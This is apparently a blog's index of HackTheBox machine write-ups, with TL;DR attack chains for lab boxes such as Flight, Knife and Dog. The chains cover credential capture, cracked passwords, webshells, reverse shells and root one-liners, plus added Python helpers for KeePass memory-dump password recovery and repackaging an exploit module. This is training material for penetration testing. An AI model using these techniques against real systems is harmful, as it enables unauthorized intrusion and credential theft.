
HTB: Flight

Machine #73 on the Lain Kusanagi list. Flight earns its Hard rating not through any single clever trick, but through sheer chain length - each hop unlocks exactly one new thing, and you have to string six or seven of them together to reach SYSTEM. It’s a patience test as much as a technical one.

Machine Info
Name: Flight
Platform: HackTheBox
OS: Windows
Difficulty: Hard
IP: 10.129.7.136
Domain: flight.htb

TL;DR
- Nmap shows a full AD port set. Gobuster vhost finds school.flight.htb, a PHP app with a ?view= parameter vulnerable to LFI.
- UNC path inclusion leaks svc_apache’s NTLMv2 hash via Responder - john cracks it to S@Ss!K@*t13. Password spray finds S.Moon reuses the same password.
- S.Moon has WRITE on the Shared share - use ntlm_theft to drop a desktop.ini coercion file, Responder captures C.Bum’s hash, john cracks it to Tikkycoll_431012284.
- C.Bum has WRITE on the Web share - upload a PHP webshell, get a reverse shell as svc_apache.
- Generate a msfvenom payload, catch it in msfconsole, upload RunasCs via meterpreter, run as C.Bum to get a second session.
- Port-forward port 8000 (internal IIS dev site) through the C.Bum session, discover C:\inetpub\development is writable, upload an ASPX webshell, get a shell as IIS AppPool\DefaultAppPool.
- That account has SeImpersonatePrivilege - msfconsole getsystem uses Named Pipe Impersonation (EfsPotato variant) to land NT AUTHORITY\SYSTEM.
...

June 4, 2026 · 6 min · João Vítor Bonin

HTB: Giddy

SQL injection doesn’t always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn’t - and that’s enough to steal credentials. Giddy is a great example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload.

Machine Info
Name: Giddy
Platform: HackTheBox
OS: Windows
Difficulty: Medium
IP: 10.129.96.140

TL;DR
- ASP.NET MVC app has a search endpoint vulnerable to SQL injection.
- We use xp_dirtree to force the SQL Server to authenticate outbound to our Responder instance, capturing Stacy’s NTLMv2 hash. After cracking it, Evil-WinRM gives us a shell.
- On the machine we find a unifivideo folder hinting at CVE-2016-6914 - Ubiquiti UniFi Video’s Windows service runs taskkill.exe from a user-writable folder when it stops, so a planted taskkill.exe executes as SYSTEM.
- Defender blocks msfvenom, so we cross-compile a custom Go payload to add a local admin user and RDP in as that administrator.
...

May 31, 2026 · 4 min · João Vítor Bonin

HTB: Editorial

Another medium box that starts with just a web form and ends with a root shell through a surprisingly elegant chain. Editorial is all about knowing what to look for — and what to ask the server to fetch for you.

Machine Info
Name: Editorial
Platform: HackTheBox
OS: Linux
Difficulty: Medium
IP: 10.129.1.101

TL;DR
SSRF on the book cover URL field
→ internal API on port 5000
→ /api/latest/metadata/messages/authors leaks SSH creds for dev
→ git history in ~/apps reveals prod credentials
→ prod can run a GitPython clone script as root
→ ext:: protocol injection sets SUID on /bin/bash
→ root
...

May 22, 2026 · 5 min · João Vítor Bonin

HTB: Buff - OSCP Prep Write-up

Two vulnerabilities, zero authentication required for either one. Buff is a good reminder that public exploits sometimes just work - and that internal services running on non-standard ports are always worth the extra look.

Machine info
Name: Buff
Platform: HackTheBox
OS: Windows
Difficulty: Easy

TL;DR
- Web app running Gym Management System 1.0 is vulnerable to unauthenticated RCE (EDB-48506) - drops a webshell and a shell as buff\shaun
- Internal port 8888 is running CloudMe 1.1.12, accessible only from localhost
- Uploaded Chisel for port forwarding, then fired a buffer overflow exploit (EDB-48389) against CloudMe to get a SYSTEM shell

Recon
Nmap
nmap -sV -sC -Pn 10.129.2.18
...

May 19, 2026 · 3 min · João Vítor Bonin

HTB: Jerry - OSCP Prep Write-up

Default credentials. WAR file upload. SYSTEM. Jerry is short, but it covers a technique that shows up on real engagements more often than you would expect.

Machine info
Name: Jerry
Platform: HackTheBox
OS: Windows
Difficulty: Easy

TL;DR
- Apache Tomcat 7.0.88 on port 8080 with default credentials (tomcat:s3cret)
- Uploaded a malicious WAR reverse shell via the Tomcat Manager
- Shell landed directly as NT AUTHORITY\SYSTEM - both flags in a single session

Recon
Nmap
nmap -sV -sC -Pn 10.129.34.208
...

May 19, 2026 · 2 min · João Vítor Bonin

HTB: Keeper - OSCP Prep Write-up

Default credentials and a comment field that should never have held a password - two very human mistakes that open the door all the way to root.

Machine info
Name: Keeper
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR
- Web server redirects to tickets.keeper.htb running Request Tracker (RT) - default credentials (root:password) work
- A user profile comment reads “Initial password set to Welcome2023!” - SSH access as lnorgaard
- Home directory contains RT30000.zip with a KeePass dump and .kdbx file
- keepass_dump recovers a partial master password; context clues complete it
- KeePass vault holds a PuTTY SSH key for root - convert and log in

Recon
Nmap
nmap -sV -sC -Pn -A 10.129.229.41
...
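As an added illustration of the keepass_dump step (this is not the write-up's code nor the public dumper itself), the recovery idea reimplemented in Python. KeePass 2.x before 2.54 (CVE-2023-32784) left, for every character typed into the masked master-password box, a .NET string of mask bullets followed by that character in process memory, so a dump yields every position except the first and sometimes several candidates per position. The memory blob, its noise bytes and the password inside it are all constructed here, not taken from a real KeePass.DMP.

```python
import re
from collections import defaultdict

# The bullet KeePass displays in the masked password box, as .NET keeps it in memory: UTF-16LE.
MASK = "\u25cf"
MASK_UTF16 = MASK.encode("utf-16-le")  # b"\xcf\x25"


def fake_memory(password: str, noise: bytes = b"") -> bytes:
    """Constructed stand-in for a process dump (not real data): for each position
    i >= 1 the leftover string is i bullets followed by the character at i.
    The first character never appears, which is why real dumps miss it too."""
    chunks = [noise]
    for i in range(1, len(password)):
        chunks.append((MASK * i + password[i]).encode("utf-16-le"))
        chunks.append(b"\x00" * 8)  # gap between allocations
    return b"".join(chunks)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan for a run of UTF-16LE bullets followed by one UTF-16 code unit.
    The run length is the character's position. Unrelated memory can match too,
    so each position keeps a set of candidates instead of a single answer."""
    pattern = re.compile(rb"((?:" + re.escape(MASK_UTF16) + rb")+)(..)", re.DOTALL)
    found: dict[int, set[str]] = defaultdict(set)
    for m in pattern.finditer(dump):
        position = len(m.group(1)) // 2  # two bytes per bullet
        ch = m.group(2).decode("utf-16-le", errors="ignore")
        if ch and ch.isprintable():
            found[position].add(ch)
    return dict(found)


def reconstruct(found: dict[int, set[str]]) -> str:
    """Render the result the way an analyst reads it: '?' where nothing was found
    (always position 0), '{..}' where memory offered more than one candidate."""
    if not found:
        return ""
    out = []
    for i in range(max(found) + 1):
        cands = sorted(found.get(i, ()))
        if len(cands) == 1:
            out.append(cands[0])
        elif cands:
            out.append("{" + "".join(cands) + "}")
        else:
            out.append("?")
    return "".join(out)


# Constructed noise holding a stray bullet pair, to produce a false candidate at position 2.
NOISE = b"\x00\x01\x02\x03" + b"\xcf\x25\xcf\x25A\x00" + b"\xff\xfe"

if __name__ == "__main__":
    dump = fake_memory("Pa55w0rd!", noise=NOISE)
    print(reconstruct(recover_candidates(dump)))  # ?a{5A}5w0rd!
```

The output is exactly the shape the write-up describes: a mostly-known password with a hole at the front and an ambiguity or two that context (language, keyboard layout, what else the user typed) has to resolve.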

May 18, 2026 · 3 min · João Vítor Bonin

HTB: Knife - OSCP Prep Write-up

Sometimes the vulnerability is not in your target’s code - it is in their supply chain. Knife is a good example of what happens when a poisoned release slips through.

Machine info
Name: Knife
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR
- A web server running PHP 8.1.0-dev - a development build carrying the backdoor that was committed to PHP’s git repository in March 2021 - allows arbitrary command execution via a custom HTTP header
- Initial shell as james, sudo -l reveals the knife CLI can be run as root without a password
- sudo knife exec -E "exec('/bin/bash')" drops a root shell immediately

Recon
Nmap
nmap -sV -sC -Pn -A 10.129.34.68
...

May 18, 2026 · 3 min · João Vítor Bonin

HTB: Precious - OSCP Prep Write-up

A PDF converter hiding a command injection CVE, credentials buried in a Ruby config file, and a YAML deserialization gadget to finish it off - Precious stacks three clean techniques on top of each other.

Machine info
Name: Precious
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR
- Web app converts URLs to PDFs using pdfkit v0.8.6, which is vulnerable to CVE-2022-25765 (command injection)
- Initial shell as ruby, Bundler config at ~/.bundle/config leaks credentials for user henry
- Henry can run a Ruby script as root with sudo; the script uses YAML.load - exploitable via deserialization to get a root shell

Recon
Nmap
nmap -sV -sC -Pn -A 10.129.228.98
...

May 18, 2026 · 3 min · João Vítor Bonin

HTB: Devvortex - OSCP Prep Write-up

Directory brute-force gets you nowhere on Devvortex. The win is one layer up - in the subdomains.

Machine info
Name: Devvortex
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR
- Subdomain enumeration reveals dev.devvortex.htb, running Joomla 4.2.6
- joomscan identifies the exact version; CVE-2023-23752 leaks usernames and the admin password via unauthenticated REST API endpoints
- Log in as lewis, edit the active Cassiopeia template to plant a PHP webshell, get a shell as www-data
- configuration.php re-exposes the MySQL password; query the sd4fg_users table and crack logan’s bcrypt hash with John
- su logan, check sudo: (ALL:ALL) /usr/bin/apport-cli - escape through the less pager to root

Recon
Nmap
nmap -sV -sC -Pn -A devvortex.htb
...

May 16, 2026 · 4 min · João Vítor Bonin

HTB: Dog - OSCP Prep Write-up

Sometimes nmap does half the work for you. .git on port 80 is all the hint you need.

Machine info
Name: Dog
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR
- Nmap’s http-git script flags an exposed .git directory; a browser extension confirms it
- gitdumper.py reconstructs the repository and surfaces the Backdrop CMS settings file with database credentials: root:BackDropJ2024DS2024
- The git log commit message references the Backdrop URL aliases docs, which reveals the /accounts/[user:name] pattern - wfuzz enumerates valid usernames, and the DB password logs in as tiffany
- Backdrop 1.27.1 has a known authenticated RCE (EDB 52021); the module installer only accepts tar/tgz/gz/bz2, so the exploit’s zip output needs repackaging before upload - shell as www-data
- Two users on the box; the same DB credential switches to johncusack
- sudo -l shows bee (Backdrop’s CLI) without a password; bee php-eval with --root gives root

Recon
Nmap
...
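The repackaging step above is the one people trip over, so here is an added helper for it (not the write-up's code and not the public exploit): it turns an in-memory .zip into the .tar.gz that Backdrop's module installer accepts, keeping the module folder's relative paths, using only the Python standard library. The module files it bundles are constructed placeholders, not a payload.

```python
import io
import tarfile
import zipfile


def zip_to_targz(zip_bytes: bytes) -> bytes:
    """Re-archive every file of a .zip as a gzip-compressed tar. Member names are
    kept verbatim so the top-level module directory survives the conversion."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf, \
            tarfile.open(fileobj=out, mode="w:gz") as tf:
        for info in zf.infolist():
            if info.is_dir():
                continue  # tar recreates directories from member paths
            data = zf.read(info)
            member = tarfile.TarInfo(name=info.filename)
            member.size = len(data)
            member.mode = 0o644
            tf.addfile(member, io.BytesIO(data))
    return out.getvalue()


def build_sample_zip() -> bytes:
    """Constructed stand-in for an exploit's zip output: a minimal Backdrop module
    layout with a .info file and a PHP file (placeholder content, no payload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("shell/shell.info", "name = shell\ntype = module\nbackdrop = 1.x\n")
        zf.writestr("shell/shell.php", "<?php // placeholder, not the exploit payload\n")
    return buf.getvalue()


def targz_members(tgz: bytes) -> list[str]:
    """Sorted member names, for checking the result before uploading it."""
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tf:
        return sorted(m.name for m in tf.getmembers())


def read_member(tgz: bytes, name: str) -> bytes:
    """Contents of one member, to confirm file bodies survived intact."""
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tf:
        return tf.extractfile(name).read()


if __name__ == "__main__":
    tgz = zip_to_targz(build_sample_zip())
    with open("shell.tar.gz", "wb") as fh:
        fh.write(tgz)
    print(targz_members(tgz))  # ['shell/shell.info', 'shell/shell.php']
```

In practice you would feed the exploit's real zip bytes to zip_to_targz and upload the resulting file; the installer only checks the archive type, so nothing inside needs to change.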

May 16, 2026 · 4 min · João Vítor Bonin